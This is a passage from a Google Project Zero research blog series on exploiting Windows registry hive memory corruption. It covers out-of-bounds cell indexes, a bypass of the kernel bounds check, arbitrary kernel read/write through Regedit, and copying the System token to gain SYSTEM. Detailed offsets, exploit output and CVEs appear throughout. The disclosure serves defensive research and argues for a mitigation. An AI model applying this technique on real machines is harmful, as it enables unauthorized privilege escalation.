correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us. If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity. Step 2: Getting read/write access to the CMHIVE kernel object Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise: This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information: Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. nt!DbgBreakPointWithStatus: fffff800`8061ff20 cc              int     3 0: kd> !analyze -v ******************************************************************************* *                                                                             * *                        Bugcheck Analysis                                    * *                                                                             * ******************************************************************************* REGISTRY_ERROR (51) Something has gone badly wrong with the registry.  If a kernel debugger is available, get a stack trace. It can also indicate that the registry got an I/O error while trying to read one of its files, so it can be caused by hardware problems or filesystem corruption. It may occur due to a failure in a refresh operation, which is used only in by the security system, and then only when resource limits are encountered. Arguments: Arg1: 0000000000000001, (reserved) Arg2: ffffd4855dc36000, (reserved) Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of         HvCheckHive if the hive is corrupt. [...] 0: kd> k  # Child-SP          RetAddr               Call Site 00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus 01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12 02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71 03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107 04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5 05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5 06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e 07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e 08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25 09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114 We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series. To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:   _HV_GET_CELL_CONTEXT Context;   //   // Translate the cell index to virtual address   //   PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);   //   // Operate on the cell view using the CellAddress pointer   //   ...   //   // Release the cell   //   Hive->ReleaseCellRoutine(Hive, &Context) There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls. The presence or absence of the "release" function in consecutive Windows versions is shown below:Windows NT 3.1 – 2000: ❌Windows XP – 7: ✅Windows 8 – 8.1: ❌Windows 10 – 11: ✅ Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x: VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX RealCell;   _HMAP_ENTRY *MapEntry;   RealCell = Context->Cell & 0xFFFFFFFE;   MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);   if (MapEntry == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);   }   if ((Context->Cell & 1) != 0) {     HvpMapEntryReleaseBinAddress(MapEntry);   }   HvpGetCellContextReinitialize(Context); } _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {   DWORD StorageType = CellIndex >> 31;   DWORD StorageIndex = CellIndex & 0x7FFFFFFF;   if (StorageIndex < Hive->Storage[StorageType].Length) {     return &Hive->Storage[StorageType].Map                                      ->Directory[(CellIndex >> 21) & 0x3FF]                                      ->Table[(CellIndex >> 12) & 0x1FF];   } else {     return NULL;   } } VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {   ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown); } VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {   Context->Cell = -1;   Context->Hive = NULL; } As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered. This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form: VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX Cell = Context->Cell;   DWORD StorageIndex = Cell & 0x7FFFFFFF;   DWORD StorageType = Cell >> 31;   if (StorageIndex >= Hive->Storage[StorageType].Length ||       &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);   }   Context->Cell = -1;   Context->BinContext = 0; } The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead? As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way: if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {   KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267); } The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage: 0: kd> dx (&((_HHIVE*)0)->Storage[0].Length) (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118 0: kd> dx (&((_HHIVE*)0)->Storage[1].Length) (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390 As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice: 0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)  (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390 0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4 Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c MapTable     = ffff810713debe90  MapEntry     = ffff810713debed8  BinAddress = ffff810713f82000, BlockOffset = 0000000000000000 BlockAddress = ffff810713f82000  pcell:  ffff810713f82390 So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps: Crafting a controlled registry value with a data index of 0xB260338C.Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability. To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place. The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future. For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path. Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor: It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory: 0: kd> dt _HHIVE ffff810713f82000 nt!_HHIVE    +0x000 Signature        : 0xbee0bee0    +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0    +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0    +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0    +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0    +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0    +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0    +0x038 HiveLoadFailure  : (null)    +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK [...] Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!Step 3: Getting arbitrary read/write access to the entire kernel address space At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be. If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂 The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr. In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences: _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU)._CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives. For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list. The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields: _CMHIVE layout _HMAP_ENTRY layout +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT +0x000 BlockOffset         : Uint8B +0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK +0x008 PermanentBinAddress : Uint8B +0xb80 Frozen           : UChar +0x010 MemAlloc            : Uint4B On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number. As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose: >>> MakeCellIndex(1, 0x7F, 0x29, 0) 0x8fe29000 So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below: The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved. We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement: return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration. So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations: The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything. However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg: 0: kd> ? nt Evaluate expression: -8781857554432 = fffff803`50800000 0: kd> db /c8 fffff803`50800004 fffff803`50800004  03 00 00 00 04 00 00 00  ........ fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........ fffff803`50800014  00 00 00 00 40 00 00 00  ....@... fffff803`5080001c  00 00 00 00 00 00 00 00  ........ fffff803`50800024  00 00 00 00 00 00 00 00  ........ fffff803`5080002c  00 00 00 00 00 00 00 00  ........ fffff803`50800034  00 00 00 00 00 00 00 00  ........ fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........ fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be And then let's browse to the same address using our FakeKey in Regedit: The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC. An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂Step 4: Elevating process security token With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below. This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows: C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg [+] Found kernel base address: fffff80350800000 [+] Spawning a command prompt... [+] Found PID 6892 at address ffff8107b3864080 [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943 [+] Exploit succeeded, enjoy! C:\Users\user\Desktop\exploits> Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges: As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation: Final thoughts Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken: To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.Exploit mitigations The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical. Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.False File Immutability So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open. As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed. However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.Conclusion Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!

Posted by Mateusz Jurczyk, Google Project Zero In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail. Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows): and temporal violations, such as use-after-free conditions: In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.Where to start: high-level overview of potential options Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation. The exploitation of classic memory corruption bugs typically involves the following steps: Initial memory corruption primitive?????????Profit (in the form of arbitrary code execution, privilege escalation, etc.) The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance: In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation: Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.Intra-hive corruption Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.Performing hive-only attacks in privileged system hives To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met: The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug. Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell"). Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this: To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in 